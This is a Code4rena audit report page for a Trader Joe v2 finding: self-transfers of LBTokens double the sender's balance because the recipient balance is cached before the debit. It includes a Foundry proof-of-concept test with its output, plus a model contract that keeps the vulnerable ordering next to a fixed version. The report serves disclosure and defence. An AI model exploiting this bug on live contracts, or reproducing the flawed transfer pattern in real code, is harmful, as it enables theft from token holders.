Trader Joe v2 contest - bitbopper's results

One-stop-shop decentralized trading on Avalanche.

General Information

Platform: Code4rena

Start Date: 14/10/2022

Pot Size: $100,000 USDC

Total HM: 12

Participants: 75

Period: 9 days

Judge: GalloDaSballo

Total Solo HM: 1

Id: 171

League: ETH

Researcher Performance

Rank: 57/75

Findings: 1

Award: $0.33

🌟 Selected for report: 0

🚀 Solo Findings: 0

Findings Information

Awards

0.3268 USDC - $0.33

Labels

bug
3 (High Risk)
satisfactory
duplicate-299

External Links

Link to code

https://github.com/code-423n4/2022-10-traderjoe/blob/79f25d48b907f9d0379dd803fc2abc9c5f57db93/src/LBToken.sol#L176::L196

Impact

When a malicious user sends LBTokens to their own address, their balance increases by the amount sent. The vulnerable function _transfer is reachable via the public functions safeBatchTransferFrom and safeTransferFrom.

L187 effectively saves _toBalance before _fromBalance is adjusted. If _from == _to, attackers can effectively double their balance. The step can be repeated endlessly and leads to complete loss of value of whatever the LBToken represents.

Proof of concept

See recommended mitigation.

Recommended Mitigation Steps

Ensure that _from != _to in the _transfer function. Add the code below to test/LBToken.t.sol to catch regressions once the bug is fixed (the test also works as a proof of concept).

Code

function testSafeTransferFromToSelf() public {
    uint256 amountIn = 1e18;

    // Mint LBTokens to DEV by adding liquidity
    (uint256[] memory _ids, , , ) = addLiquidity(amountIn, ID_ONE, 5, 0);

    // Transfer DEV's full balance of the first bin to DEV itself
    uint balance_amount_pre = pair.balanceOf(DEV, _ids[0]);
    pair.safeTransferFrom(DEV, DEV, _ids[0], balance_amount_pre);
    uint balance_amount_pos = pair.balanceOf(DEV, _ids[0]);

    // Log the details when the self-transfer changed the balance
    if (balance_amount_pre != balance_amount_pos) {
        emit log_named_string("FAIL", "transfer to self increases balance");
        emit log_named_uint("balance before transfer", balance_amount_pre);
        emit log_named_uint("balance after transfer", balance_amount_pos);
        emit log_named_uint("balance increase", balance_amount_pos-balance_amount_pre);
    }

    // A self-transfer must leave the balance unchanged
    assertEq(balance_amount_pos, balance_amount_pre);
}

Output

Running 1 test for test/LBToken.t.sol:LiquidityBinTokenTest
[FAIL. Reason: Undefined.] testSafeTransferFromToSelf() (gas: 1015343)
Logs:
  FAIL: transfer to self increases balance
  balance before transfer: 333333333333333333
  balance after transfer: 666666666666666666
  ....
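The caching order described under Impact, next to the recommended _from != _to guard, as an added example. This is a minimal model written for this page, not the LBToken source; the contract, function and error names are hypothetical.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.10;

/// Minimal model of the balance-caching pattern in this finding.
/// Hypothetical names throughout; this is not the LBToken code.
contract SelfTransferModel {
    error InsufficientBalance(uint256 have, uint256 want);
    error SelfTransfer();

    // id => account => balance
    mapping(uint256 => mapping(address => uint256)) public balances;

    /// Test helper only: unrestricted mint so the model can be exercised.
    function mint(address to, uint256 id, uint256 amount) external {
        balances[id][to] += amount;
    }

    /// Vulnerable ordering: both balances are read before either is written.
    /// When from == to, toBalance is a stale copy of the pre-debit balance,
    /// so the second write overwrites the debit and stores balance + amount.
    function transferCached(address from, address to, uint256 id, uint256 amount) external {
        uint256 fromBalance = balances[id][from];
        uint256 toBalance = balances[id][to]; // stale if from == to
        if (fromBalance < amount) revert InsufficientBalance(fromBalance, amount);

        balances[id][from] = fromBalance - amount;
        balances[id][to] = toBalance + amount;
    }

    /// Hardened form: reject self-transfers, and credit the recipient by
    /// reading storage after the debit instead of using a cached value.
    function transferChecked(address from, address to, uint256 id, uint256 amount) external {
        if (from == to) revert SelfTransfer();

        uint256 fromBalance = balances[id][from];
        if (fromBalance < amount) revert InsufficientBalance(fromBalance, amount);

        balances[id][from] = fromBalance - amount;
        balances[id][to] += amount;
    }
}
```

The guard alone matches the recommended mitigation; crediting with += after the debit additionally keeps the total unchanged even if the guard is later removed.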

#0 - itsmetechjay

2022-10-24T16:24:53Z

Warden submitted issue via email to sockdrawermoney prior to contest close due to login issues over the weekend

#2 - GalloDaSballo

2022-10-26T16:35:12Z

#3 - c4-judge

2022-11-23T18:28:06Z

GalloDaSballo marked the issue as not a duplicate

#4 - c4-judge

2022-11-23T18:28:21Z

GalloDaSballo marked the issue as duplicate of #299

#5 - Simon-Busch

2022-12-05T06:38:22Z

Marked this issue as Satisfactory as requested by @GalloDaSballo
